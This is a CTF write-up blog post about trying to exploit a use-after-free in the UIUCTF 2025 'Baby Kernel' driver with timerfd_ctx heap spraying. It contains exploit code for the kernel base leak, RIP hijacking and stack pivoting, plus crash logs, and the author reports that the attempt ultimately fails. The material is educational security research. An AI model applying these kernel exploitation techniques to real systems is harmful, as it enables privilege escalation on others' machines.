Utkar5hM
2025/08/05

Kernel Exploitation Pitfalls #2: timerfd_ctx | UIUCTF 2025

This is a continuation of the Kernel Exploitation Pitfalls #1 blog, so I recommend reading that first. I’ll be using the same Baby Kernel challenge from UIUCTF 2025.

Now, I could’ve gone ahead and used the modprobe_path technique discussed by h0mbre, with a more detailed write-up by lkmidas. It looks way simpler and more direct. But before going down that route, I wanted to try something similar to my first approach, only this time using a different structure.

While going through this great reference on kernel exploitation structs, timerfd_ctx immediately stood out. It looked promising because we could potentially use it to control the instruction pointer (RIP), leak the kernel base address, and maybe even leak the heap.

Interestingly, there are a couple of writeups that use timerfd_ctx for the HotRod challenge, so it’s clearly viable. But I wanted to do it unassisted. Even though it seemed straightforward at first (lol), there were some surprisingly interesting observations that came up and definitely needed documenting. And oh, we failed in this blog as well.


Approach #2

Let’s first take a look at the structure we’ll be working with.

timerfd_ctx

The timerfd_ctx structure can be backed by either an hrtimer or an alarm. For this exploration, I chose the hrtimer path, since the kernel eventually calls the timer's callback once the specified interval has elapsed. That callback is the function field shown below; its return type is enum hrtimer_restart, so I'll loosely refer to it as the hrtimer_restart function.

The callback takes a pointer to an hrtimer as its argument, and if our assumption is correct, that pointer refers to the same hrtimer inside our timerfd_ctx. Conveniently, the hrtimer is the first member of the timerfd_ctx struct, so the argument points at the very start of our object.

That opens up an opportunity. If the kernel ends up jumping into hrtimer_restart, and we control the timerfd_ctx layout in memory, it could serve as a pivot into our ROP chain, effectively treating timerfd_ctx as our fake stack.

When the callback is invoked, both RDI and R14 should point to the timerfd_ctx, which makes it an ideal candidate for stack pivoting.

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};

struct timerfd_ctx {
	union {
		struct hrtimer tmr;
		struct alarm alarm;
	} t;
	ktime_t tintv;
	ktime_t moffs;
	wait_queue_head_t wqh;
	u64 ticks;
	int clockid;
	short unsigned expired;
	short unsigned settime_flags;	/* to show in fdinfo */
	struct rcu_head rcu;
	struct list_head clist;
	spinlock_t cancel_lock;
	bool might_cancel;
};
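To make the layout concrete, here is a minimal userland sketch that mirrors the leading fields of struct hrtimer and computes where the function pointer sits when the object is viewed as an array of 8-byte words. The mirror_* names and the helper are hypothetical, and the sketch assumes the x86_64 layout (8-byte longs and pointers) with no extra config-dependent fields.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userland mirrors of the kernel structs above (hypothetical names,
 * x86_64 layout assumed: 8-byte longs and pointers). */
struct mirror_rb_node {
    unsigned long parent_color;          /* __rb_parent_color */
    struct mirror_rb_node *rb_right;
    struct mirror_rb_node *rb_left;
};

struct mirror_timerqueue_node {
    struct mirror_rb_node node;
    int64_t expires;                     /* ktime_t is a signed 64-bit value */
};

struct mirror_hrtimer {
    struct mirror_timerqueue_node node;
    int64_t softexpires;
    int (*function)(struct mirror_hrtimer *);
    void *base;
    uint8_t state, is_rel, is_soft, is_hard;
};

/* Index of `function` when the object is read as uint64_t words. */
static size_t hrtimer_function_qword(void)
{
    size_t off = offsetof(struct mirror_hrtimer, function);
    assert(off % sizeof(uint64_t) == 0);
    return off / sizeof(uint64_t);
}
```

Under these assumptions the helper returns 5, which is the same index used to read the callback pointer out of the leaked buffer later in this post.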

Allocating a timerfd_ctx struct

We can use the calls below to create an hrtimer-backed timerfd and arm it with a specified timeout.

int timer_fd = timerfd_create(CLOCK_MONOTONIC, 0);

// arming the timer
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_nsec = 100000; // 100μs
// timer_spec.it_value.tv_sec = 0; // 0 seconds
timerfd_settime(timer_fd, 0, &timer_spec, NULL);

Executing the hrtimer_restart function

Waiting for the specified amount of time should be enough to trigger it.

How do we exploit this?

This looks much simpler compared to the previous method.

  1. Allocate and free heap memory using our vulnerable driver.
  2. Spray timerfd_ctx structs into the freed heap and leak the kernel base to calculate gadget addresses.
  3. Place a ROP gadget where hrtimer_restart is expected, so that it pivots RSP to RDI.
  4. Place the actual ROP chain at the start of the timerfd_ctx.

Exploitation

Try #1

1. Allocate and free our heap through the vulnerable driver.

int vuln_fd = open("/dev/vuln", O_RDWR);
if (ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
  perror("ALLOC failed");
  return -1;
}
if (ioctl(vuln_fd, FREE) != 0) {
  perror("FREE failed");
  return -1;
}

2. Allocate a timerfd_ctx in our freed heap and leak base addresses.

Let’s spray a bunch of timerfd_ctx structs to improve our chances.

char *uaf_buf = malloc(alloc_size);
printf("uaf_buf: %p\n", uaf_buf);
wait_for_enter(); // just a function waiting for me to press enter.
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_sec = 10; // 10 seconds
for (; spray_count < 1; spray_count++) {
	timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
}
for(int i = 0; i < spray_count; i++) {
  timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
}

// Read the freed chunk back through the dangling pointer
if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
    perror("USE_READ failed");
    free(uaf_buf);
    return -1; // uaf_buf must not be used after this point
}

uint64_t *leak = (uint64_t*)uaf_buf;
uint64_t timerfd_tmrproc = leak[5];
base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
printf("base_address: 0x%lx\n", base_kernel_address);

We get the following output, and the base_address is successfully leaked. This can be confirmed using a SUID binary.

./exploit
uaf_buf: 0x22f1840
base_address: 0xffffffffaf000000
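A cheap sanity check on the leak can catch a missed spray before anything is overwritten. The sketch below is a hypothetical helper, not part of the original exploit: it assumes the x86_64 kernel text mapping starts at 0xffffffff80000000 and that KASLR keeps the base 2 MiB aligned, which matches every base address printed in this post. The offset 0x2e6a20 used in the usage note is simply the difference between the timerfd_tmrproc and base_address values printed in the Try #4 output further down, so it only applies to this kernel build.

```c
#include <assert.h>
#include <stdint.h>

#define KERNEL_TEXT_MIN 0xffffffff80000000ULL  /* assumed start of kernel text mapping */
#define KASLR_ALIGN     0x200000ULL            /* assumed 2 MiB base alignment */

static_assert((KASLR_ALIGN & (KASLR_ALIGN - 1)) == 0,
              "alignment must be a power of two");

/* Returns the kernel base implied by a leaked function pointer,
 * or 0 if the result does not look like a plausible base. */
static uint64_t kernel_base_from_leak(uint64_t leaked_ptr, uint64_t symbol_offset)
{
    if (leaked_ptr < KERNEL_TEXT_MIN || leaked_ptr < symbol_offset)
        return 0;

    uint64_t base = leaked_ptr - symbol_offset;
    if (base < KERNEL_TEXT_MIN || (base & (KASLR_ALIGN - 1)) != 0)
        return 0;

    return base;
}
```

For example, kernel_base_from_leak(0xffffffff9bee6a20, 0x2e6a20) gives 0xffffffff9bc00000, while a leaked value that is not a kernel text pointer gives 0 and signals that the spray did not land in the freed chunk.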

3. Place a ROP gadget in hrtimer_restart's slot to point RSP at RDI/R14.

First, let’s confirm whether we can control RIP by setting it to 0xdeadbeefdeadbe00 using the following code:

leak[5] = 0xdeadbeefdeadbe00ULL;
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
  printf("USE_WRITE failed\n");
  goto cleanup;
}

Output:

./exploit
uaf_buf: 0x772840
base_address: 0xffffffff8a000000
[+] Press Enter to continue
[    2.531059] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[   12.511589] general protection fault: 0000 [#1] PREEMPT SMP NOPTI
[   12.512248] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[   12.512594] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[   12.513402] RIP: 0010:0xdeadbeefdeadbe00
[   12.514261] Code: Unable to access opcode bytes at 0xdeadbeefdeadbdd6.
[   12.514569] RSP: 0018:ff54d2c6c0003f28 EFLAGS: 00010082
[   12.514889] RAX: ff2427c7c761f701 RBX: deadbeefdeadbe00 RCX: 0000000000000001
[   12.515165] RDX: 0000000000000000 RSI: 0000000000000006 RDI: ff2427c7c1bf5800
[   12.515430] RBP: ff2427c7c761f1c0 R08: ff2427c7c761f220 R09: 0000000000000000
[   12.515669] R10: 0000000000000000 R11: ff54d2c6c0003ff8 R12: 0000000000000006
[   12.515948] R13: ff2427c7c761f220 R14: ff2427c7c1bf5800 R15: ff2427c7c761f200
[   12.516243] FS:  0000000000000000(0000) GS:ff2427c7c7600000(0000) knlGS:0000000000000000
[   12.516524] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   12.516708] CR2: deadbeefdeadbe00 CR3: 0000000001c10000 CR4: 0000000000751ef0
[   12.517032] PKRU: 55555554
[   12.517227] Call Trace:
[   12.517952]  <IRQ>
[   12.518263]  ? die_addr+0x31/0x80
[   12.518537]  ? exc_general_protection+0x1af/0x3d0
[   12.518753]  ? check_preempt_curr+0x32/0x70
[   12.518924]  ? asm_exc_general_protection+0x26/0x30
[   12.519156]  ? __hrtimer_run_queues+0x10d/0x2a0
[   12.519324]  ? hrtimer_interrupt+0xf3/0x230
[   12.519464]  ? __sysvec_apic_timer_interrupt+0x4b/0x140
[   12.519698]  ? sysvec_apic_timer_interrupt+0x65/0x80
[   12.519993]  </IRQ>
[   12.520146]  <TASK>

As we can see, the kernel crashes with RIP set to our value, so the function pointer at timerfd_ctx[5] (counting in 8-byte words) is under our control. The plan is to put the stack pivot gadget there and the ROP chain at timerfd_ctx[0].

This time, I was able to find a working stack pivot gadget:

// 0xffffffff81241107 : push rdi ; pop rsp ; xor eax, eax ; test edx, edx ; jle 0xffffffff81241114 ; jmp 0xffffffff81eafa50
// That jump leads to ret :D 

Let’s test if we can successfully pivot to a ROP chain.

leak[0] = 0xdeadbeefdeadbe00ULL;
leak[5] = base_kernel_address + gadget1; // Overwrite with gadget address

if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
  printf("USE_WRITE failed\n");
  goto cleanup;
}

Output:

[+] Press Enter to continue
[    2.655822] tsc: Refined TSC clocksource calibration: 3193.917 MHz
[    2.656770] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2e09d7b4b0a, max_idle_ns: 440795227609 ns
[    2.657417] clocksource: Switched to clocksource tsc
[    2.680992] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[    3.607364] kernel tried to execute NX-protected page - exploit attempt? (uid: 0)
[    3.607849] BUG: unable to handle page fault for address: ff35f6d141c05500
[    3.608281] #PF: supervisor instruction fetch in kernel mode
[    3.608569] #PF: error_code(0x0011) - permissions violation
[    3.609039] PGD 6801067 P4D 6802067 PUD 6803067 PMD 1c1f063 PTE 8000000001c05163
[    3.609723] Oops: 0011 [#1] PREEMPT SMP NOPTI
[    3.610151] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[    3.610453] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    3.610936] RIP: 0010:0xff35f6d141c05500
[    3.611523] Code: ff ff 00 55 c0 41 d1 f6 35 ff 10 00 00 00 00 00 00 00 46 00 01 00 00 00 00 00 08 55 c0 41 d1 f6 35 ff 18 00 00 00 00 00 00 00 <00> 55 c0 41 d1 f6 35 ff 10 f7 61 47 d1 f6 35 ff 00 00 00 00 00 00
[    3.612247] RSP: 0018:ff35f6d141c05508 EFLAGS: 00010046
[    3.612469] RAX: 0000000000000000 RBX: ffffffff83441107 RCX: 0000000000000001
[    3.612746] RDX: 0000000000000000 RSI: 0000000000000002 RDI: ff35f6d141c05500
[    3.612993] RBP: ff35f6d14761f1c0 R08: ff35f6d14761f220 R09: 0000000000000000
[    3.613258] R10: 0000000000000000 R11: ff7a6da980003ff8 R12: 0000000000000002
[    3.613540] R13: ff35f6d14761f220 R14: ff35f6d141c05500 R15: ff35f6d14761f200
[    3.613933] FS:  0000000000000000(0000) GS:ff35f6d147600000(0000) knlGS:0000000000000000

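Interesting. Instead of 0xdeadbeefdeadbe00, RIP is 0xff35f6d141c05500, which matches RDI, and RSP is RDI + 8. So the pivot itself worked: the gadget's ret popped the first 8 bytes of the object, but by then they no longer held our value and pointed back at the object itself. Since the heap is NX-protected, the instruction fetch faulted. If you debug this in GDB, you'll notice that the kernel changes this value on its own once the struct is allocated and in use.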
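The register values in that crash can be reproduced with a tiny model of the gadget. This is only a simulation in userland (the struct and function names are made up for illustration): it treats `push rdi ; pop rsp` as RSP = RDI and `ret` as popping the first 8-byte word of the object into RIP.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct cpu_state {
    uint64_t rip;
    uint64_t rsp;
};

/* Models `push rdi ; pop rsp ; ... ; ret` for an object located at
 * kernel address obj_addr whose contents are given by obj_words. */
static struct cpu_state pivot_then_ret(uint64_t obj_addr, const uint64_t *obj_words)
{
    assert(obj_words != NULL);

    struct cpu_state s;
    s.rsp = obj_addr;        /* push rdi ; pop rsp  =>  RSP = RDI */
    s.rip = obj_words[0];    /* ret pops the qword at [RSP] into RIP */
    s.rsp += 8;              /* ...and moves RSP past it */
    return s;
}
```

If word 0 of the object holds the object's own address (0xff35f6d141c05500 in the log), the model ends with RIP = 0xff35f6d141c05500 and RSP = 0xff35f6d141c05508, which is exactly what the oops shows.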

After cleaning up the code a bit and running it again, I ended up hitting the following error:

[+] Press Enter to continue
[    4.251144] general protection fault, probably for non-canonical address 0xdeadbeefdeadbe08: 0000 [#1] PREEMPT SMP NOPTI
[    4.251823] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[    4.252121] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    4.252580] RIP: 0010:rb_insert_color+0x18/0x140
[    4.253106] Code: 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 07 48 85 c0 0f 84 ba 00 00 00 48 8b 10 f6 c2 01 75 59 <48> 8b 4a 08 48 39 c1 74 55 48 85 c9 74 05 f6 01 01 74 7c 48 8b 48
[    4.253868] RSP: 0018:ffffffffaa003dc0 EFLAGS: 00010046
[    4.254132] RAX: ff1ae31b01c03f00 RBX: ff1ae31b04e1f710 RCX: ff1ae31b01c03f10
[    4.254420] RDX: deadbeefdeadbe00 RSI: ff1ae31b04e1f220 RDI: ff1ae31b04e1f710
[    4.254695] RBP: 0000000000000000 R08: ff1ae31b04e1f220 R09: 0000000000018001
[    4.254963] R10: 0000000000000000 R11: 0000000000000007 R12: 0000000000018001
[    4.255255] R13: 00000001125c34c0 R14: ff1ae31b04e1f200 R15: 000000000001f1c0
[    4.255594] FS:  0000000000000000(0000) GS:ff1ae31b04e00000(0000) knlGS:0000000000000000
[    4.255956] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    4.256182] CR2: deadbeefdeadbe08 CR3: 0000000001c10000 CR4: 0000000000751ef0
[    4.256516] PKRU: 55555554
[    4.256709] Call Trace:
[    4.257587]  <TASK>
[    4.257944]  ? die_addr+0x31/0x80
[    4.258135]  ? exc_general_protection+0x1af/0x3d0
[    4.258380]  ? asm_exc_general_protection+0x26/0x30
[    4.258616]  ? rb_insert_color+0x18/0x140
[    4.258768]  timerqueue_add+0x66/0xb0
[    4.258968]  enqueue_hrtimer+0x2a/0x80
[    4.259107]  hrtimer_start_range_ns+0xf5/0x350
[    4.259288]  ? get_next_timer_interrupt+0x7a/0x110
[    4.259442]  tick_nohz_idle_stop_tick+0x233/0x2a0
[    4.259597]  ? sched_clock+0x10/0x30
[    4.259747]  do_idle+0x1d4/0x220
[    4.259857]  cpu_startup_entry+0x25/0x30
[    4.259972]  rest_init+0xc0/0xc0
[    4.260083]  arch_call_rest_init+0x9/0x30
[    4.260294]  start_kernel+0x414/0x670
[    4.260459]  x86_64_start_reservations+0x18/0x30
[    4.260670]  x86_64_start_kernel+0xc5/0xd0
[    4.260817]  secondary_startup_64_no_verify+0x178/0x17b
[    4.261075]  </TASK>

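The crash occurs inside rb_insert_color, which rebalances a red-black tree after a node has been linked into it. Note that RDX holds our 0xdeadbeefdeadbe00 and the faulting address is RDX + 8, so the tree code is dereferencing the value we wrote to timerfd_ctx[0]. The call trace also shows that this isn't even our timer being armed: another timer insertion from the idle loop walked into our corrupted node.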

Let’s take a closer look at the hrtimer structure:

struct rb_node {
	unsigned long  __rb_parent_color;
	struct rb_node *rb_right;
	struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

struct timerqueue_node {
	struct rb_node node;
	ktime_t expires;
};

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};

Reviewing the kernel source reveals the following:

SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags)
{
	struct timerfd_ctx *ctx;
  // some other stuff
	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
  // some other stuff
  hrtimer_init(&ctx->t.tmr, clockid, HRTIMER_MODE_ABS);
}

static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id,
			   enum hrtimer_mode mode)
{
	timerqueue_init(&timer->node);
}

static inline void timerqueue_init(struct timerqueue_node *node)
{
	RB_CLEAR_NODE(&node->node);
}


#define RB_CLEAR_NODE(node)  \
	((node)->__rb_parent_color = (unsigned long)(node))

We can observe that the node field is initialized to point to itself when we call timerfd_create(). But what about rb_insert_color?

SYSCALL_DEFINE4(timerfd_settime, int, ufd, int, flags,
		const struct __kernel_itimerspec __user *, utmr,
		struct __kernel_itimerspec __user *, otmr)
{
	ret = do_timerfd_settime(ufd, flags, &new, &old);
}


static int do_timerfd_settime(int ufd, int flags, 
		const struct itimerspec64 *new,
		struct itimerspec64 *old)
{ 
	struct timerfd_ctx *ctx;
	ret = timerfd_setup(ctx, flags, new);
}
static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
			 const struct itimerspec64 *ktmr)
{
      //somewhere
			hrtimer_start(&ctx->t.tmr, texp, htmode);
}

static inline void hrtimer_start(struct hrtimer *timer, ktime_t tim,
				 const enum hrtimer_mode mode)
{
	hrtimer_start_range_ns(timer, tim, 0, mode);
}

static int __hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
				    u64 delta_ns, const enum hrtimer_mode mode,
				    struct hrtimer_clock_base *base)
{
  // lot of stuff
	first = enqueue_hrtimer(timer, new_base, mode);
  // lot of stuff
}
static int enqueue_hrtimer(struct hrtimer *timer,
			   struct hrtimer_clock_base *base,
			   enum hrtimer_mode mode)
{

	return timerqueue_add(&base->active, &timer->node);
}

/**
 * timerqueue_add - Adds timer to timerqueue.
 *
 * @head: head of timerqueue
 * @node: timer node to be added
 *
 * Adds the timer node to the timerqueue, sorted by the node's expires
 * value. Returns true if the newly added timer is the first expiring timer in
 * the queue.
 */
bool timerqueue_add(struct timerqueue_head *head, struct timerqueue_node *node)
{
	/* Make sure we don't add nodes that are already added */
	WARN_ON_ONCE(!RB_EMPTY_NODE(&node->node));

	return rb_add_cached(&node->node, &head->rb_root, __timerqueue_less);
}


/**
 * rb_add_cached() - insert @node into the leftmost cached tree @tree
 * @node: node to insert
 * @tree: leftmost cached tree to insert @node into
 * @less: operator defining the (partial) node order
 *
 * Returns @node when it is the new leftmost, or NULL.
 */
static __always_inline struct rb_node *
rb_add_cached(struct rb_node *node, struct rb_root_cached *tree,
	      bool (*less)(struct rb_node *, const struct rb_node *))
{
	struct rb_node **link = &tree->rb_root.rb_node;
	struct rb_node *parent = NULL;
	bool leftmost = true;

	while (*link) {
		parent = *link;
		if (less(node, parent)) {
			link = &parent->rb_left;
		} else {
			link = &parent->rb_right;
			leftmost = false;
		}
	}

	rb_link_node(node, parent, link);
	rb_insert_color_cached(node, tree, leftmost);

	return leftmost ? node : NULL;
}

static inline void rb_insert_color_cached(struct rb_node *node,
					  struct rb_root_cached *root,
					  bool leftmost)
{
	if (leftmost)
		root->rb_leftmost = node;
	rb_insert_color(node, &root->rb_root);
}

While diving deeper into this may not yield direct value for exploitation, it's clear that the kernel uses red-black trees to manage timers, and the first 8 bytes of timerfd_ctx are the rb_node's __rb_parent_color field. timerfd_create() initializes it to point at the node itself, and arming the timer with timerfd_settime() links the node into the tree, after which the kernel reads and rewrites that field whenever the tree changes. So timerfd_ctx[0] is not ours to scribble on freely.
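The effect on the first word can be replayed in userland. The sketch below copies the logic of RB_CLEAR_NODE, RB_EMPTY_NODE and rb_link_node onto a mirror struct; the mirror names and the demo function are hypothetical, and rebalancing (rb_insert_color) is deliberately left out.

```c
#include <assert.h>
#include <stddef.h>

struct rb_node_mirror {
    unsigned long parent_color;          /* __rb_parent_color */
    struct rb_node_mirror *rb_right;
    struct rb_node_mirror *rb_left;
};

/* Same logic as RB_CLEAR_NODE: the node points at itself. */
static void clear_node(struct rb_node_mirror *n)
{
    n->parent_color = (unsigned long)n;
}

/* Same logic as RB_EMPTY_NODE. */
static int node_is_empty(const struct rb_node_mirror *n)
{
    return n->parent_color == (unsigned long)n;
}

/* Same logic as rb_link_node: the first word now records the parent. */
static void link_node(struct rb_node_mirror *n, struct rb_node_mirror *parent,
                      struct rb_node_mirror **link)
{
    assert(link != NULL);
    n->parent_color = (unsigned long)parent;
    n->rb_left = n->rb_right = NULL;
    *link = n;
}

/* Returns 1 if the first word is a self pointer after init and a
 * parent pointer after linking, mirroring create followed by settime. */
static int first_word_changes_on_link(void)
{
    struct rb_node_mirror root = {0}, timer = {0};

    clear_node(&root);
    clear_node(&timer);                  /* what timerfd_create() leaves behind */
    int self_after_init = node_is_empty(&timer);

    link_node(&timer, &root, &root.rb_right);   /* what arming the timer does */
    int parent_after_link = timer.parent_color == (unsigned long)&root &&
                            !node_is_empty(&timer);

    return self_after_init && parent_after_link;
}
```

Either way, the first word of the object is a live pointer that the tree code follows, which is why overwriting it with a ROP gadget address breaks things.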

Try #2

Now that the modification is known to occur after a short delay, we can introduce a brief pause before overwriting timerfd_ctx[0], with the goal of racing the kernel’s logic and gaining control over the structure in time.

usleep(20); // 20μs
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
  printf("USE_WRITE failed\n");
  goto cleanup;
}

Output:

[+] Press Enter to continue
[    2.592776] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[    2.976739] general protection fault, probably for non-canonical address 0xf608c383480b8b58: 0000 [#1] PREEMPT SMP NOPTI
[    2.977266] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1
[    2.977491] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[    2.977819] RIP: 0010:rb_next+0x18/0x50
[    2.978216] Code: 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 0f 48 39 cf 74 33 48 8b 57 08 48 85 d2 74 1d 48 89 d0 <48> 8b 52 10 48 85 d2 75 f4 c3 cc cc cc cc 48 3b 78 08 75 15 48 8b
[    2.978730] RSP: 0018:ff6627f000003f10 EFLAGS: 00010086
[    2.978881] RAX: f608c383480b8b48 RBX: ff13089641987128 RCX: 0000000000000001
[    2.979044] RDX: f608c383480b8b48 RSI: ff13089641987128 RDI: ff13089641987128
[    2.979224] RBP: ff1308964761f220 R08: 0000000000000004 R09: 0000000000000000
[    2.979392] R10: 0000000000000000 R11: ff6627f000003ff8 R12: 0000000000000006
[    2.979579] R13: ff1308964761f220 R14: ff13089641987128 R15: ff1308964761f200
[    2.979767] FS:  0000000000000000(0000) GS:ff13089647600000(0000) knlGS:0000000000000000
[    2.979966] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    2.980109] CR2: f608c383480b8b58 CR3: 0000000001c10000 CR4: 0000000000751ef0
[    2.980321] PKRU: 55555554
[    2.980465] Call Trace:
[    2.981147]  <IRQ>
[    2.981390]  ? die_addr+0x31/0x80
[    2.981515]  ? exc_general_protection+0x1af/0x3d0
[    2.981630]  ? asm_exc_general_protection+0x26/0x30
[    2.981765]  ? rb_next+0x18/0x50
[    2.981850]  timerqueue_del+0x1f/0x50
[    2.981984]  __hrtimer_run_queues+0xdf/0x2a0
[    2.982105]  hrtimer_interrupt+0xf3/0x230
[    2.982219]  __sysvec_apic_timer_interrupt+0x4b/0x140
[    2.982339]  sysvec_apic_timer_interrupt+0x65/0x80
[    2.982561]  </IRQ>
[    2.982624]  <TASK>
[    2.982671]  asm_sysvec_apic_timer_interrupt+0x1a/0x20
[    2.982897] RIP: 0010:default_idle+0xf/0x20

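Now rb_next() faults instead. According to the call trace it is reached from timerqueue_del() inside __hrtimer_run_queues(), so this is the expiry path removing our timer from the red-black tree, and there could be more functions like it.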

Try #3

We can try to rewrite the heap just before the timer is about to expire, so that the tree operations in between run on intact data. We get the following output:

./exploit
uaf_buf: 0x688840
base_address: 0xffffffff81800000
[    2.531285] BUG: kernel NULL pointer dereference, address: 0000000000000000
[    2.531656] #PF: supervisor write access in kernel mode
[    2.531821] #PF: error_code(0x0002) - not-present page
[    2.531982] PGD 1c02067 P4D 1c18067 PUD 1c2b067 PMD 0 
[    2.532274] Oops: 0002 [#1] PREEMPT SMP NOPTI
[    2.532515] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O       6.6.16 #1

[    2.533046] RIP: 0010:rb_erase+0x18b/0x3a0
[    2.533398] Code: 48 83 c0 01 48 89 01 c3 cc cc cc cc c3 cc cc cc cc 48 89 46 10 e9 17 ff ff ff 48 8b 56 10 48 8d 41 01 48 89 51 08 48 89 4e 10 <48> 89 02 48 8b 01 48 89 06 48 89 31 48 83 f8 03 0f 86 96 00 00 00
[    2.533843] RSP: 0018:ff48cf3480003f10 EFLAGS: 00010046
[    2.533986] RAX: ff1fe4150198b129 RBX: ff1fe4150761f710 RCX: ff1fe4150198b128
[    2.534140] RDX: 0000000000000000 RSI: ff1fe41501c06500 RDI: ff1fe4150761f710
[    2.534307] RBP: ff1fe4150761f220 R08: ff1fe4150761f220 R09: ff1fe41501bb9790
[    2.534479] R10: ff1fe4150762b580 R11: ff48cf3480003ff8 R12: 0000000000000002
[    2.534649] R13: ff1fe4150761f220 R14: ff1fe4150761f710 R15: ff1fe4150761f200
[    2.534964] FS:  0000000000000000(0000) GS:ff1fe41507600000(0000) knlGS:0000000000000000
[    2.535235] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    2.535412] CR2: 0000000000000000 CR3: 0000000001c12000 CR4: 0000000000751ef0
[    2.535663] PKRU: 55555554
[    2.535804] Call Trace:
[    2.536553]  <IRQ>
[    2.536884]  ? __die+0x1e/0x60
[    2.537021]  ? page_fault_oops+0x17c/0x470
[    2.537131]  ? exc_page_fault+0x6b/0x150
[    2.537278]  ? asm_exc_page_fault+0x26/0x30
[    2.537437]  ? rb_erase+0x18b/0x3a0
[    2.537543]  timerqueue_del+0x2e/0x50
[    2.537695]  __hrtimer_run_queues+0xdf/0x2a0
[    2.537826]  hrtimer_interrupt+0xf3/0x230
[    2.537947]  __sysvec_apic_timer_interrupt+0x4b/0x140
[    2.538082]  sysvec_apic_timer_interrupt+0x65/0x80
[    2.538290]  </IRQ>
[    2.538350]  <TASK>
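For reference, the "write just before expiry" timing from this attempt could be sketched roughly as follows. This is not the code I ran; the helper names are hypothetical, and it assumes the deadline is tracked on CLOCK_MONOTONIC by taking clock_gettime() right before arming the timer and adding the timeout.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <assert.h>
#include <time.h>

#define NSEC_PER_SEC 1000000000L

/* deadline minus margin_ns, normalised so that 0 <= tv_nsec < 1e9 */
static struct timespec wake_time_before(struct timespec deadline, long margin_ns)
{
    assert(margin_ns >= 0 && margin_ns < NSEC_PER_SEC);

    struct timespec t = deadline;
    t.tv_nsec -= margin_ns;
    if (t.tv_nsec < 0) {
        t.tv_nsec += NSEC_PER_SEC;
        t.tv_sec -= 1;
    }
    return t;
}

/* Sleep until margin_ns before an absolute CLOCK_MONOTONIC deadline.
 * Returns 0 on success or an error number from clock_nanosleep(). */
static int sleep_until_before(struct timespec deadline, long margin_ns)
{
    struct timespec wake = wake_time_before(deadline, margin_ns);
    return clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, &wake, NULL);
}
```

The USE_WRITE ioctl would go right after sleep_until_before() returns. As the crash above shows, shrinking the window does not help when the expiry path itself dereferences the overwritten node.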

Digging deep again, I came across this:

static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
			  struct hrtimer_clock_base *base,
			  struct hrtimer *timer, ktime_t *now,
			  unsigned long flags) __must_hold(&cpu_base->lock)
{

	enum hrtimer_restart (*fn)(struct hrtimer *);
  // between bazillion other stuff
	__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);

	fn = timer->function;
	restart = fn(timer);
}

static void __remove_hrtimer(struct hrtimer *timer,
			     struct hrtimer_clock_base *base,
			     u8 newstate, int reprogram)
{
  // between bazillion other stuff
	if (!timerqueue_del(&base->active, &timer->node)) {
    // does something
  }
}

bool timerqueue_del(struct timerqueue_head *head, struct timerqueue_node *node)
{
	WARN_ON_ONCE(RB_EMPTY_NODE(&node->node));

	rb_erase_cached(&node->node, &head->rb_root);

	return !RB_EMPTY_ROOT(&head->rb_root.rb_root);
}
static inline struct rb_node *
rb_erase_cached(struct rb_node *node, struct rb_root_cached *root)
{
  //other stuff 
	rb_erase(node, &root->rb_root);
}

